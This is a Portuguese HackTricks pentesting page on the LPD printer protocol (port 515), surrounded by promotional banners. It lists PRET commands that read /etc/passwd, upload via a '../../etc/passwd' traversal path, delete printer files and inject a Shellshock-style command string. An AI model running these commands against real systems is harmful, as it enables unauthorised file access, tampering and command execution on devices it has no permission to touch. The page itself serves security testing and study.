3.7 KiB
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github HackTricks e HackTricks Cloud.
O protocolo Line Printer Daemon (LPD) foi originalmente introduzido no Berkeley Unix nos anos 80 (posteriormente especificado pelo RFC1179).
O daemon é executado na porta 515/tcp e pode ser acessado usando o comando lpr
. Para imprimir, o cliente envia um arquivo de controle definindo o trabalho/usuário e um arquivo de dados contendo os dados reais a serem impressos. O tipo de entrada do arquivo de dados pode ser definido no arquivo de controle escolhendo entre vários formatos de arquivo. No entanto, cabe à implementação do LPD como realmente lidar com os dados de impressão. Uma implementação popular do LPD para sistemas operacionais semelhantes ao Unix é o LPRng. O LPD pode ser usado como um meio para implantar trabalhos de impressão maliciosos em PostScript ou PJL.
As ferramentas lpdprint
e lpdtest
estão incluídas no PRET. Elas são uma maneira minimalista de imprimir dados diretamente em uma impressora compatível com LPD ou baixar/upload/excluir arquivos e mais:
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
Se você quer aprender mais sobre hackear impressoras leia esta página.
Shodan
porta 515
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.